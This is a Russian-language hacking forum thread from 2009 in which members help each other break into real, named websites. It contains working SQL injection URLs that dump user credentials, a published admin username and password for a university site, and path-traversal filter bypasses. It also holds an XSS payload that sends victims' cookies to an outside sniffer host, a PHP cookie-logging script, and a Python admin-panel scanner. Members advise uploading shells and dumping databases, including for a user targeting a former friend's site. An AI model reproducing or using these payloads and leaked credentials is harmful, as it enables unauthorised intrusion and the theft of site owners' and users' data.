Просмотр полной версии : Ваши вопросы по уязвимостям.
DrAssault
29.03.2009, 17:06
Какой суффикс, че к чему? Ошибка тебе говорит о следующем, что таблици test в бд abc нет просто напросто и никакой это не суфикс, сначала узнай таблицу, а уж потом текущую БД к ней, соответственно, если версия пятая, если же 4, то тут жоперский-перебор...
Друзья, я был некорректен,
версия 4.1.* (information_schema - нет)
при попытке подбирать имя таблицы "TEST" сайт отвечает что не может найти таблицу "ABC.TEST".
вопрос был как раз про этот суффикс.
а еще подскажите как мне поможет шелл в добывании списка login:pass пользователей сайта
DrAssault
29.03.2009, 18:17
Друзья, я был некорректен,
версия 4.1.* (information_schema - нет)
при попытке подбирать имя таблицы "TEST" сайт отвечает что не может найти таблицу "ABC.TEST".
вопрос был как раз про этот суффикс.
а еще подскажите как мне поможет шелл в добывании списка login:pass пользователей сайта
Послушай ты чем читаешь? Тебе выше уже ответили, что не префикс это и не суффикс и не что то еще, это БД abc и в ней нет твоей таблицы!!!!!!!
а еще подскажите как мне поможет шелл в добывании списка login:pass пользователей сайта
Всё зависит от прав ...
Например если есть возможность прочитать файл конфига бд или сценарий имеющий в себе конф данные,появиться возможность попасть в бд сайта... Это только один из примеров.
DrAssault
29.03.2009, 18:27
Всё зависит от прав ...
Например если есть возможность прочитать файл конфига бд или сценарий имеющий в себе конф данные,появиться возможность попасть в бд сайта... Это только один из примеров.
Ну права это не проблема их и поднять можно...
при попытке подбирать имя таблицы "TEST" сайт отвечает что не может найти таблицу "ABC.TEST".
Товарищ, это не суффикс, а имя базы, в которой находится таблица, из которой mysql пытается получить данные по твоему запросу.
Если он так отвечает, значит такой таблицы в данной базе не существует. Подбирай дальше, пробуй другие имен таблиц – users, user, members, admin и тп
а еще подскажите как мне поможет шелл в добывании списка login:pass пользователей сайта
Хорошо поможет. Можно даже сказать все сам сделает за тебя =) Сливай нужные таблицы через шелл
Ох как же вы задолбали своими загадками... Уважаемые, вся необходимая теория имеется в статьях и мануалах. А если вы тут вопрос задаете по конкретной уязвимости, то будьте добры ПОСТИТЬ ССЫЛКУ. Скоро мы тут все телепатами станем... Спасибо за внимание
самое интересное что после определенного интервала времени во всю трахая мозги, обычно выкладывают урлу.
З.Ы. Я думаю что у нас jokester полутелепат:)))
+++AndreyDevil+++
29.03.2009, 20:05
Вот скуля с таблицами..............
http://www.columbiasouthern.edu/facesofcsu/index.asp?id=-1'+or+1=(SELECT+TOP+1+TABLE_NAME+FRO
M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('CourseInformation','Testimonials'
,'Corp_partner','States','Countries','Ad_Codes','A dminUsers','Affiliates','AppOnline','carthead','ca rtrows','CartRo
wsOptions','Categories','Categories_Products','cla sses','classes_and_text','Corp_partner_description ','Corp_pa
rtner_featured','Counselor','customer','D99_REG',' D99_Tmp','DiscOrder','DiscProd','dtproperties','En rollmentSe
ssion','Faces','Faculty','FORUM_A_REPLY'))--
http://www.columbiasouthern.edu/admin/
Username:admin
Password:csupride12
Как сюда шелл залить? ) Блин........может где нибудь ещё админка есть?
Pashkela
29.03.2009, 20:17
в чем проблема-то? Я в админке:)
Спасибо
+++AndreyDevil+++
29.03.2009, 20:20
в чем проблема-то? Я в админке:)
Спасибо
Админка то админкой )) а шелл? Или я слепой? ))
в чем проблема-то? Я в админке:)
Спасибо
а там ведь еще есть
http://columbiasouthern.edu/alliances/partners/cms.aspx :)
Pashkela
29.03.2009, 20:23
А сорри, не так понял, пока не вижу, ничего загружать не даёт, сплошной html какой-то, надо думать. Aктивку можно понятно впихать, но неинтересно
Pashkela
29.03.2009, 20:24
а там ведь еще есть
http://columbiasouthern.edu/alliances/partners/cms.aspx :)
) А туда пароль другой:)
если там асп и только штмл вставляется, есть надежда что работаю SSI команды
дерзайте =)
Здрацте , приятного времени сутак.
Ближе к делу .
3 стоплца .
ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+group+by+3+--
но
ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+union+select+1,2,3+--
неправленое количество стоплцоф
Што мозно исправьте или где об етом поподробнее
Pashkela
29.03.2009, 23:16
http://www.tsfjazz.com/podcast-detail.php?id=-3/**/union/**/select/**/version(),2,3,4,5
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
order by юзай
2 Pashkela
Што за брет, почему 5 их ?
Когда , на 3 толко нормално отобразает страницу =(
Сначала подбери кол-во полей через order+by+..., т.е. order+by+1 -ошибка? значит больше, и так д минимального числа пока нету ошибки) А вообще почитай темы про SQL-inj - там лучше написано ;)
2 попугай
Видел што советавали ползоваца group а не order
но не ветом дело .
2 Tigger
Ето я знаю , видемо изменение в тексте ошибки ,можно взят как ответ ... Вот и ответил сам на свои вопрос )
Jokester
29.03.2009, 23:43
Там два запроса, их отлично видно в ошибке
1-й 3 поля, без вывода
Erreur dans la requete : select titre, date_format(datd, '%d/%m/%Y') as dd, id from podc where id_prg=3/**/order/**/by/**/4/* order by datd desc, titre
2-ой 5 полей выводится
Erreur dans la requete : select nom, anim, photo, corps, horaire from prog where id=3/**/order/**/by/**/6/*
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)
запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*
Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
Это означает, что колонки "name" не найденно ;)
ПаВлУшКа
30.03.2009, 01:01
У меня вопрос по MS Access. Есть сайт http://www.ruw.edu.bh/template2.asp?id=218
Подобрал кол-во полей с помощью order+by, их оказалось 13. Попробовал угадать имя таблицы, угадал таблицу user. Но при таком запросе
http://www.ruw.edu.bh/template2.asp?id=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+fro m+user
Выводит какую-то ошибку...( Что я не так делаю?
Jokester
30.03.2009, 01:34
Access имеет зарезервированные слова и символы которые нельзя использовать абы как :)
В данном случае ничего ты не нашёл, user не может быть таблицей, как и любое из этих слов :
http://office.microsoft.com/ru-ru/access/HA100306431049.aspx
Soviet[HZ]
30.03.2009, 01:38
select+from+user использовать нельзя
вот прочти ещё это:
https://forum.antichat.ru/showpost.php?p=898813&postcount=25
Pashkela
30.03.2009, 02:16
Сделал брутер для именно этого сайта (Access) по словарям от SIPT4 - ни одной таблы не нашел, гы
если интересно, путь:
'c:\windows\system32\inetsrv\
Интересно, у кого-нибудь есть словари для ACCESS? А то скрипт есть, а словаря нормального на такие случаи нет:)
S0ulVortex
30.03.2009, 17:29
Собственно просто так выкладываю так как просто красивая ошибка жаль правда не че вывести нельзя.
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/order/**/by/**/99%23
Pashkela
30.03.2009, 17:34
Почему нельзя, 4-ая ветка:
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
S0ulVortex
30.03.2009, 17:39
Почему нельзя, 4-ая ветка:
http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
Ну че то я не вижу версии :) Или я не туда смотрел :)
Pashkela
30.03.2009, 17:40
Если вместо 4 подставить 3 или 5 - результат на странице будет совсем другой. Тут blind sql-inj, но вполне работабельный
Ambassadorik
31.03.2009, 02:08
Вечер добрый , вобщем нашёл на одном крупном сайте xss (пассивку). Попытался вывести куки через алерт , и получил :
<store.**********.com>
undefined ,
Что бы это могло значить ?
Calcutta
31.03.2009, 09:41
Ambassadorik, "undifined" переводится как "не определено", думай что хочешь.
м/б у тебя куки пустые?
DrAssault
31.03.2009, 10:04
Тупо нет куков, т.к. находишься на сайте на правах гостя, хотя есть еще много вариантов...
Что бы это могло значить ? Скорее всего ты в XSS опечатался, например вместо document.cookie написал document.cookies .
Ambassadorik
31.03.2009, 15:37
да , точно ...написал document.cookiee
ph1l1ster
31.03.2009, 16:45
Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется.
можно заливать любые файлы. залил пустой .htacess, таже фигня.
подскажите как быть.
phtml,php3,php5,phps?
но скорее всего не поможет. кинь ссылку, поковырять можно будет.
Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется.
можно заливать любые файлы. залил пустой .htacess, таже фигня.
подскажите как быть.
Воспользуйся плагином для фф (или другим альтернативным способом), перехвати то, что передается серверу... Там может быть, что типо файл только html передается и т.д... =) Еще кстати попробуй так [filename].html.PhP5 - может поможет ;)
Нашел тут SQL-иньекция и вот очень хочеться раскрутить)
Вот сама иньекия:
http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34+from+gnn_users--
К сожелению не могу никак подобрать колонки =( Может поможет кто-нить) ?
http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,us r_name,usr_pass),11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_us ers--
Сурс морды смотрите
<div class="input_wrap"><input type="text" name="usr_name" value="user name" onfocus="if(this.value=='user name')this.value='';" onblur="if(this.value=='')this.value='user name';"></div>
<div class="input_wrap"><input type="password" name="usr_pass" value=""></div>
Я уже несколько раз обращал на это внимание. Прямой связи тут конечно нет, но нужно учитывать “человеческий фактор”
Такс... Спасибо) Но к сожелению пассы к админке не подошли( Может еще таблицы найдем какие-нибудь) ?
-m0rgan-
31.03.2009, 21:40
Эм...если я не ошибаюсь, то там бйсик авторизация и пароли для входа в админку хранятся в файле htpasswd, а не в БД!
(http://gnn.tv/admin)
Нашел сайт, на котором в поле личных сообщений(социалка) выполняется html код, а следовательно и javascript
Недолго думая залил xss снифер на хост, составил ссылку
<script>window.location.href='http://htos.ru/sniffer/s.gif?'+document.cookie;</script>
проверил ссылку на лок. компутере - работает, средиректил на настоящую фотографию.
начал тестировать на сайте - пошли первые рога.
Отчеты не приходят, хотя скрипт съедает чисто.
Как это лечится?
Снифер брал с http://pashkela.narod.ru/sniffer.rar
-m0rgan-
31.03.2009, 22:21
Мб, стоит зашифровать путь к снифферу?
-m0rgan-, вы гений.
Точно. Нужно было зашифровать строку.
2 месяца непрерывной е**ли с сайтом и все так просто...
Спасибо, -m0rgan-.
Krist_ALL
31.03.2009, 22:53
Я сталкнулся с такой проблемой. Я с трудом нахожу бажный скрипты с инекцией. Прочитал всякие faq по sql инжекшен да я и php с Mysql знаю нормально впринципе, но вт что-то с поиском не очень. Поделитесь соображениями как искать..Очень редко попадаются скрипты с уязвимостями.
2Krist_ALL тут не раз уже обсуждалась эта тема, всем вопросам ответ гугл, вбей в поиск например .php?id= или .php?news= ну или как тебе угодно, конечно можешь сразу поискать MySql error in бла бла бла..но это уже паблик и не факт что сайт либо похеканый давно либо уже в бд не существует инфы для сайта, но для тренировки сойдет
Krist_ALL
31.03.2009, 23:08
Так и делаю. Но бажных скриптов почти не попадается! Все стойкие
-m0rgan-
31.03.2009, 23:11
Krist_ALL, позволю поправить Gorev'a.
Для поиска по урлу в гугле используется команда inurl:
Пример:
inurl:news.php?id=1
И пройдя по первой ссылке
(http://ocenshik.mostpp.ru/news.php?id=1)
Видим бажный скрипт:
http://ocenshik.mostpp.ru/news.php?id=1'
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 95
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 97
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 98
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 99
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/_functions.php on line 88
по первой ссылке
(www.globalwaterfoundation.org/news.php?id=1)
Видим бажный скрипт:
www.globalwaterfoundation.org/news.php?id=1'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
И так далее...
Krist_ALL, ну и я свои 5 копеек вставлю... то что бывает не находятся бажные скрипты абсолютно нормально =) не уязвим этот параметр, так узвим другой... то есть смотри на параметры и так далее, так же не забывай что ошибки не всегда выводятся иногда просто вырублен их вывод... поэтому стоит понаблюдать за выводом при разных значениях, грубо говоря что если при news.php?a=1' не выводится новость, а при news.php?a=1 выводится то это м.б. скуль =) хотя не факт =) короче все методом проб и ошибок =)
-m0rgan-
31.03.2009, 23:43
На счёт бажных скриптов, то не только кавычку пихать надо, есть и другие способы имитировать ошибку БД...по поводу этого можно почитать в замечательном FAQ от jokester'a (http://forum.antichat.ru/thread104591.html)
Nightmarе
01.04.2009, 19:18
Вот вопрос возник. Есть на php такой код, параметру lol= передаётся имя файла, и он его выдаёт на скачку из определённой директории.
Естественно таким образом можно скачать любой файл на сервере путём ../index.php например...
Но в скрипте стоит защита:
$getfile = str_replace("..", "", $getfile);
$getfile = str_replace("/", "", $getfile);
Которая фильтрует .. и / Вполне возможно что читать произвольные файлы на сервере всё равно можно как-то, если кто знает как это сделать, то напишите.
Желательно не в теории как это реализуется, а пример, как это сделать.
-m0rgan-
01.04.2009, 19:22
2 Nightmarе
можно попробывать закодировать ../ типа 0x2e2e2f
но точно не уверен..
Pashkela
01.04.2009, 19:25
<?php
$getfile = "%2E%2E%2F"; // =../
$getfile = str_replace("..", "", $getfile);
$getfile = str_replace("/", "", $getfile);
echo $getfile;
?>
Nightmarе
01.04.2009, 19:34
Пробовал на 2 хостах, не пашут оба варианта.
Jokester
01.04.2009, 20:03
на винде:
lol=./.\file
Схема такая это ./.\ пройдёт первую проверку без изменений, а после второй срежется "/".
В итоге получим ..\
Если нужно ещё выше, думаю всё понятно ./.\./.\./.\ и т.д.
Тоесть "." впихнуть можно, а вот "/" будут резаться
К теме о Xss
Есть 3 имени cookie.
PHPSESSID, .sait.ru_c_user, .sait.ru_c_password
Как заставить скрипт записывать эти 3 параметра?:
<?
$data_filename = "data.txt";
$max_entries =0; // 0 для снятия лимита
require 'functions.php';
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes(urldecode($_SERVER['HTTP_REFERER'])));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
//$sniffed['query'] = ($_SERVER['QUERY_STRING']);
$sniffed['agent'] = htmlspecialchars(stripslashes($_SERVER['HTTP_USER_AGENT']));
$sniffed['real_ip'] = htmlspecialchars(stripslashes($_SERVER['HTTP_X_FORWARDED_FOR']));
$entrie = serialize($sniffed);
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
echo "<script>window.location.href='Location:http://www.sait.ru/;</script>";
?>
Супер переменная
$sniffed['query'] = ($_SERVER['QUERY_STRING']);
Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из
.sait.ru_c_user, .sait.ru_c_password?
CMS платная, социалка ablespace
Похожий вопрос ... можно ли как нибудь обойти =>
<?
$file = $_REQUEST["file"];
$file = ereg_replace("[\\/]+", "/", $file);
$file = ereg_replace("\.+[\\/]", "", $file);
print $file."<br>";
if (strpos($file, "/long/")!==false)
{
echo "$file";
if (strpos($file, "/long_word/long/")===0 ||
strpos($file, "/very_long_word/")===0) include($_SERVER["DOCUMENT_ROOT"]."/".$file);
print $file;
}
?>
Сорри, если не туда запостил.
Может есть у кого словарь с именами таблиц/полей.
Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
geezer.code
02.04.2009, 14:23
Сорри, если не туда запостил.
Может есть у кого словарь с именами таблиц/полей.
Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
https://forum.antichat.ru/thread93547.html
пользуемся поиском.
линк продублировал в пм.
Доброго дня всем :)
Подскажите как взломать сайт и слить его базу ?
У меня есть все файлы от сайта
Есть название и пароль от базы данных
Скрипт новости выдает ошибку при запросе: http://www.rikor-electronics.ru/news.php?id=50'
вот сама ошибка: .mysql_error().
Еслиб был доступ к фтп то можно было бы залить шел, но у меня его нет :(
Как вот с этими данными слить базу ? помогите... создатель этого сайта предал просто меня :(( а дружили с детства
-m0rgan-
02.04.2009, 15:51
http://www.rikor-electronics.ru/news.php?id=-50+union+select+version(),2,3,4--
>>Есть название и пароль от базы данных
Лей шелл и дампи бд)
а как я не очень понимаю в этом?
помогите пожалуйста я Вам подарю еще один сайт с паролями!
-m0rgan-
02.04.2009, 16:02
там установлен phpmyadmin?
На хостинге? или где?
Если на хостинге то думаю да,
Так вот найди его, и потом зайди с логином и паролем, которые ты получил. а потом - читай заливка шелла через пхпмайдмин.
-m0rgan-
02.04.2009, 16:19
Ну значит ищиш пхпмайадмин на хосте и логинишся с данными БД...
Там будет ф-я дамп БД...
Бэкап можно сделать с помощю утилы mysqldump
Для этого необходимо воспользоваться утилитой mysqldump, которая доступна через unix shell”.
Для того, выполни команду:
> mysqldump -uимя_пользователя -p -hимя_сервера_БД имя_базы > dump.sql
да блин не хватает знаний ребят, как найти phpmyadmin? адрес хостинга я знаю
заюзай какай-нить сканнер директорий мож чо ишо и найдешь! В избранном Pelmeshko HEAD Scaner был!
-m0rgan-
02.04.2009, 16:28
ette гдета выкладовал пути, только н помню где...вот кароче сохранил тогда:
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/
/phpMyAdmin1/
/phpMyAdmin2/
/phpMyAdmin-2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3/
/phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/
/phpMyAdmin-2.3.6/
/phpMyAdmin-2.3.7/
/phpMyAdmin-2.3.8/
/phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.4.1/
/phpMyAdmin-2.4.2/
/phpMyAdmin-2.4.3/
/phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/
/phpMyAdmin-2.4.6/
/phpMyAdmin-2.4.7/
/phpMyAdmin-2.4.8/
/phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.3/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.8/
/phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/
/phpMyAdmin-2.6.6/
/phpMyAdmin-2.6.7/
/phpMyAdmin-2.6.8/
/phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.1/
/phpMyAdmin-2.7.2/
/phpMyAdmin-2.7.3/
/phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/
/phpMyAdmin-2.7.6/
/phpMyAdmin-2.7.7/
/phpMyAdmin-2.7.8/
/phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.3/
/phpMyAdmin-2.8.4/
/phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/
/phpMyAdmin-2.8.7/
/phpMyAdmin-2.8.8/
/phpMyAdmin-2.8.9/
/phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-3/
/phpMyAdmin-4/
/phpMyAds/
/phpmyad-sys/
то есть нужно набирать timeweb.ru/phpMyAdmin-2.4.1/ так?
помогите мужики, подарю сайт с паролиями только другой
timeweb.ru - это хостинг
-m0rgan-
02.04.2009, 16:36
так, правда ни одна из этих дир может не подойти...
Но попытка не пытка...
В ручную перебирать - это маразм!
Вот те скрипт:
#/usr/bin/python
import sys, os, time, httplib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) != 2:
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Help: admin-find.py -h |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-----------------------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Usage: admin-find.py www.site.com |"
print "| Example: admin-find.py site.com |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1].replace("http://","").rsplit("/",1)[0]
site = site.lower()
admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php']
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "[+] Target:",site
print "[+] Checking paths..."
print
try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass
Это брутер админок, замени адреса админок на адреса расположения пхпмайадмин:
admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php']
и брути)
Спасибо большое , а как его применять?
Спасибо большое , а как его применять?
Usage: admin-find.py www.site.com
-m0rgan-
02.04.2009, 16:44
2 joomler
Качай интерпритатор питома (http://www.python.org/ftp/python/2.5/python-2.5.msi)
И запускай с командной строки: путь до питона путь до сплойта
например:
C:\Python\python.exe C:\exploit.py
-m0rgan-
02.04.2009, 16:50
joomler, ап!
Радуйся)))
Я нашол пхпмай админ=)
Линк:
http://phoenix.timeweb.ru/phpMyAdmin/
Логинишся там и делаешь свои чёрные делишки ;)
а какой пароль надо вводить в phpmyadmin 3.1.3.1 ?
-m0rgan-
02.04.2009, 18:05
2dllerk
Нужно вводить пароль от БД.
чуваки, кароче есть сайт по адресу http://novy.tv/phpmyadmin , но только там стоит Basic авторизация . как её обойти ?
Iceangel_
02.04.2009, 18:16
2 hordon
вижу я, там стоит не .htaccess, значит надо раздобыть логин:пароль к mysql
-m0rgan-
02.04.2009, 18:17
Эм...мне кажется, что это не бейсик авторизация!
При закрытии окошка авторизации выводится "Отказано в доступе" а если закрыть его при бейсик авторизации должна быть апачевская ошибка.
Скорее всего это авторизация через БД.
вот сдесь точно basic http://kyivstar.ua/admin
Iceangel_
02.04.2009, 18:24
2 -m0rgan-
Однако ты путаешь бейзик авторизацию и авторизацию через .htaccess
basic авторизация вроде как от .htaccess ..
-m0rgan-
02.04.2009, 18:30
2Iceangel_
Бля, точно перепутал =(
спасибо!
какаето подозрительная хрень https://www.kyivstar.net/admin/php-mmcache/ , называется "Turck MMCache 2.4.6", что с этим можно сделать ?
Iceangel_
02.04.2009, 18:31
2 dllerk
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="My Realm"');
header('HTTP/1.0 401 Unauthorized');
echo 'Text to send if user hits Cancel button';
exit;
} else {
echo "<p>Hello {$_SERVER['PHP_AUTH_USER']}.</p>";
echo "<p>You entered {$_SERVER['PHP_AUTH_PW']} as your password.</p>";
}
?>
вот тебе пример basic авторизации
Jokester
02.04.2009, 18:36
Iceangel_
А это какая? :)
.htaccess
AuthType Basic
AuthName ‘Login please’
AuthUserFile “D:\MyDocs\sites\test\.htpasswd”
Require valid-user
Особенное внимание на строку 1 в файле :)
-m0rgan-
02.04.2009, 18:38
2dllerk
В бейсике посылается пост запрос, а .htaccess работает с попощь. апачевской AuthType...
бейсик выглядит примерно так:
<?php echo $_SERVER['PHP_AUTH_USER']; ?>
blablabla
<form action=adduser.php method=post>
Имя <input type=text name=name><br>
Пароль <input type=password name=pass><br>
Пароль <input type=password name=pass_again><br>
<input type=submit name=sub value='Создать'>
</form>
<?php
